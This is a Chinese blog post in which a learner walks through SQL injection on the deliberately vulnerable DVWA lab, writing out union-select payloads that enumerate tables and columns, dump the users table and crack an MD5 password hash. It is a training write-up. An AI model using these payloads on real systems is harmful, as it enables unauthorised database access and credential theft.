学习渗透日记2之dvwa简单sql注入

已于 2023-03-23 12:35:06 修改
阅读量235 收藏 2
点赞数 2
文章标签: 安全 sql php 网络安全
于 2023-03-23 12:34:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56902810/article/details/129728279
版权

1.低级别SQL注入:

 

 

 

 再接着输入6,发现啥也妹有了,说明有五个用户

输入1‘ 发现存在SQL注入漏洞:

判断注入类型: 

提交后发现无输出值,表明and后面的语句不成立,即注入类型应为字符类型

判断字段长度:输入1‘ order by 1#

 同理输入2,3,4等等

发现输到3时报错,可知道查询的结果有2列

查看数据库:输入 1‘ union select 1, database()#

发现有两个数据库,admin和dvwa

查看数据库及其对应版本:

查看数据库中对应的表:

1‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

发现注入结果中出现了表名users

再去在user表下查数据库中的列:1‘ union select 1, group_concat(column_name) from information_schema.columns where table_name=’users’#

 通过注入找到了password和user列,在users里继续查找password和user

然后MD5解码:

5f4dcc3b5aa765d61d8327deb882cf99 呃只是其中一个

 解码为password

事实上,这是admin用户,在配置PHP和dvwa时此密码和admin用户自己是知道的,不妨去试试其它用户,解密其对应的md5密码,尝试换用户登录dvwa,其实也是可行的。

2.中级级别SQL注入

诸如此类,可试出有五个id

中级输入无法输入sql语句,所以用burp抓包工具抓包并改包尝试注入:

 抓包并导入repeater:

 

在id一栏改动,写入SQL语句:

 重复上述步骤:

 

 将user进行转码,然后注入:

 

成功找到密码,解密即可

 3.高级注入

 高级出现两个界面,其余与低级一样

当然顶级impossible的话基本上是无懈可击了。

404_NOT_FOUND!!
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过BurpSuite和sqlmap配合对dvwa进行sql注入测试和用户名密码暴力破解
weixin_30540691的博客
04-20 466
0x1 工具和环境介绍 dvwa渗透测试环境 BurpSuite:强大的WEB安全测试工具 sqlmap:强大的sql注入工具 以上工具和环境都在kali linux上安装和配置。 0x2 步骤说明 配置Burp Suite和浏览器。 这一步比较简单,主要是用来抓取用来sql注入的信息。 在Burp中设置proxy代理:127.0.0.1:8080,配置浏览器使用代理...
DVWA靶场之SQL注入通关详解(3),【高级网络安全架构师系统学习
最新发布
m0_61549740的博客
04-07 510
获取当前数据库(union select 1,database()),可以得到数据库为dvwa。获取数据库中的表(union select 1,group_concat(table_name) from information_schema.tables where tables_schema=database())
DVWA通过攻略之SQL注入
勿山几已
05-24 8548
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
【实训04】数据库SQL注入漏洞
一只鼠标的博客
10-17 1411
LAMP:LAMP是指一组通常一起使用来运行动态网站或者服务器的自由软件名称首字母缩写。L:Linux,操作系统A:Apache网页服务器M:MySQL,数据库管理软件P:PHP,脚本语言DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。password,将其写入。
DVWASQL注入漏洞
weixin_56306210的博客
01-30 2420
DVWASQL注入漏洞
DVWA靶场通关记录(SQL注入)
weixin_73557450的博客
05-13 1004
在MySQL中,自带的库为information_schema,其中包含MySQL中所有的数据库信息,包括所有库名、表名和列名。可以通过这个自带库获取信息。其中的表tables存储表名,表columns存储列名,通过句点“.”来连接上下级关系,例如:information_schema.tables。使用database()语句可以查询当前所在的数据库名称,user()可以查询当前登录的用户名
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
学习sql注入漏洞网址的创建
06-06
这篇文章的主题是“学习sql注入漏洞网址的创建”,它旨在帮助初学者或研究人员建立一个自定义的环境来模拟SQL注入攻击,以便于理解和实践防御措施。下面将详细介绍这个过程以及涉及的相关知识点。 首先,SQL注入...
struts2技巧,笔记.zip指定404,500页面 utf-8过滤器 防SQL注入 解决乱码
01-24
struts2技巧,笔记.zip 指定404,500页面 utf-8过滤器 防SQL注入 解决乱码
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
2020-12-06-DVWAsql.md
01-24
dvwasql
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
DVWASQL injection)
m0_55563900的博客
02-28 403
DVWASQL injection) 先输入 1 ,查看回显 (URL 中 ID=1,说明 php 页面通过 get 方法传递参数) 查看字段 输入 1’ order by 1# 和 1’ order by 2# 时都返回正常: 当输入 1’ order by 3#时 出现错误 由此可知,users 表中只有两个字段,数据为两列 接下来使用union select获取信息 输入 1’ union select database(),user()# database()将会返回当前网站所使用的数据
头歌-信息安全技术-实训04 数据库SQL注入漏洞
不服输的小乌龟
10-17 5485
搭建dvwa环境,包括1、搭建LAMP服务;2、部署dvwa服务;3、访问dvwa主页。
[DVWA]利用SQL注入漏洞的方法
weixin_45942044的博客
11-22 1006
自学[DVWA]SQL注入漏洞学习笔记
小迪安全|第12天:SQL注入之简要SQL注入
欢迎相互探讨交流知识呀~
11-15 1081
笔记
DVWA 1.9 SQL注入详解:新手教程与实战步骤
DVWA中,SQL注入是一个关键的学习模块,帮助安全专家和Web开发者了解和防御这类攻击。DVWA提供了不同安全级别的代码,使得学习过程更具挑战性。对于初学者来说,通过对比这些级别,可以学习PHP代码审计的基本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值